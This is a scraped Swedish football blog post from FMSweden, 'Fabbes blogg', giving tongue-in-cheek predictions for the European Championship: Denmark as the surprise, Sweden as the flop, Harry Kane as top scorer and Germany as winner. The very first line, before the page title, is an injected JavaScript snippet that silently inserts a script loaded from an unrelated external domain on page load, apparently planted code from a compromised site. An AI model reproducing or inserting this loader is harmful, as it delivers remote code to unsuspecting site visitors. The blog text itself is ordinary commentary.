;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Fabbes blogg: Det stora EM-tipset – FMSweden
Meny Stäng

Fabbes blogg: Det stora EM-tipset

I veckans blogg sias det om det mesta som rör mästerskapet. Har jag rätt eller har ni några motbud? Kommentera.

Mästerskapets….

…skräll: Danmark

Danskarna är på gång igen. Överlag känns det som ett väldigt bra ihopsatt lag, som om allt klaffar kan gå riktigt bra i turneringen. Hur långt? Jag säger semifinal.

…framspelare: Thomas Müller, Tyskland

Müller kan fan inte sluta göra poäng. Det verkar helt omöjligt, för hur han än trasslar till det så blir det alltid bra i slutändan ändå. Han kommer garanterat hänga ett par baljor, men det är framspelningarna som kommer stå i centrum den här turneringen. Han gör minst fem assist, och då menar jag verkligen minst.

…flopp: Sverige

Så, skriv hatkommentarerna direkt. Skriv här under, skicka mejl eller flaskpost där ni sågar mig längs med fotknölarna. Hur kan du ens komma på tanken att säga att Sverige floppar? Magkänsla är egentligen det enda svaret på den frågan. Sverige är alltid som bäst när man inte har några förväntningar på sig. Inför årets mästerskap pratas det om att man bara ska städa av Slovakien, de tre poängen är redan hemma. Polen känns inte alls vassa enligt experterna, så där kan tre poäng till komma. Och visst är känslan att man även kan rå på Spanien? Nej, säger jag. Det här blir ingen rolig sommar för oss svenskar. (Blir mer än gärna motbevisad här).

namn: Lassi Lappalainen, Finland

Kommentarer överflödiga.

…formation: 3-5-2

Tyvärr. Alla lag som inte spelar 4-4-2 förtjänar all olycka i världen. (Ja, jag vet att Sverige spelar 4-4-2 men det går åt helvete ändå).

…målvakt: Anton Sjunin, Ryssland

Inte för att han är bra, utanför att han är den första målvakt sen Sundsvall brann som vaktar Rysslands mål och inte heter Igor Akinfeev. 34-åringen ska ersätta en levande mästerskapslegend. Nu var ju inte Akinfeev så bra heller, men han var alltid där. Han ska alltid vara där.

…skyttekung: Harry Kane, England

Tråkigt svar, men likväl ett solklart val. Kommer spotta in mål för England precis som alla förväntar sig. Men vänta till 92:a minuten i kvartsfinalen när han lunkar ut för att slå en hörna i 2-1-underläge. Då snackar vi gåshud! (Ni som vet, ni vet)

…mest saknade: Jesse Lingard, England

Glöm Zlatan Ibrahimovic eller Virgil van Dijk. Att Jesse Lingard inte är uttagen i Englands trupp är den största skandalen sen Alexander Östlund petade ur VM-truppen 2006. SKANDAL var ordet!

…axelryckning: Nordmakedonien

Aha.

…förbundskapten: Andriy Shevchenko, Ukraina

Man är ju svag för ikoner som tar över sina landslag, det är man ju. Och då snackar jag alltså om Shevchenko och inte Gareth Southgate.

…slagpåse: Ungern

Går det att argumentera för något annat när man håller till i en grupp bestående av Portugal, Tyskland och Frankrike? Nej, här kommer det rassla till bakom Ungerns målvakt, som av någon outgrundlig anledning inte har gråa mjukisbyxor och heter Gabor Király. Men inte ens han hade kunnat rädda Ungern från den här slakten.

…match: England-Skottland

Den här matchen får inte sluta 0-0 och vara en långtråkig historia. Det går emot allt vad fotbollen är och innebär. Jag kommer aldrig förlåta de brittiska länderna om det här blir 0-0.

…match 2: Ukraina-Nordmakedonien

En match för finsmakarna, och som sållar fotbollsintresserade från pöbeln. Jag kommer sitta bänkad framför tv:n.

…tronskifte: Cristano Ronaldos röda kort mot Frankrike

Här tar det slut för Ronaldo. Han kommer vara arg, frustrerad och få Pepe längre bak i laget att framstå som kontrollerad. Efter 34 minuter brister det för den tidigare världsstjärnan som delar ut en armbåge mot Benjamin Pavard som faller i gräset. VAR rycker in som en hjälpande hand, och efter en dryg timmes diskussioner mellan VAR-rummet och domaren plockas det röda kortet upp. Ronaldo är frusterad, rycker sönder tröjan och ser ut ungefär som matadoren i ”Tjuren Ferdinand”. Hans lagkamrater drar tillslut av honom samtidigt som han skriker ut att han aldrig kommer röra en fotboll igen. Sagt och gjort, flyttlasset går hem till Madeira strax efter matchen och rykten säger att ha numera är fet som en fjällko och sitter och kollar bilder på sig själv i bar överkropp samtidigt som han är inne på Youtube och kollar ”CR7 best skillz – GOAT”. Tragiskt slut på en fin karriär.

…gran: Andreas Granqvist

Granen som aldrig barrar. Eller det vet vi ju egentligen inte om det stämmer längre, för Andreas Granqvist visar sig inte under hela mästerskapet. Han är kvar nere i omklädningsrummet där han sprider bra stämning även om ingen är där. En sann lagspelare!

…vinnare: Tyskland

Nej, Keven Bader. Det här skriver jag verkligen inte för din skull. Men varenda jävel säger ju att Frankrike kommer ta hem hela skiten. Och visst, man har det bästa laget, ser oerhört fina ut och har en bredd som ingen annan. Allt talar egentligen för just Frankrike, och jag förstår trots allt varför alla har dem som favoriter. Men just därför måste jag gå en helt egen vägen, och säga den rätt dåliga tysken. De senaste åren har inte varit bra. De har varit direkt värdelösa, och inget talar för att man fått ordning på allt. Men just därför är jag dumdristig nog och säger att man tar hem hela skiten. Thomas Müller löser allt själv – det behövs inte mer än så.

Tack för mig.

Please wait...

Liknande Inlägg

Lämna ett svar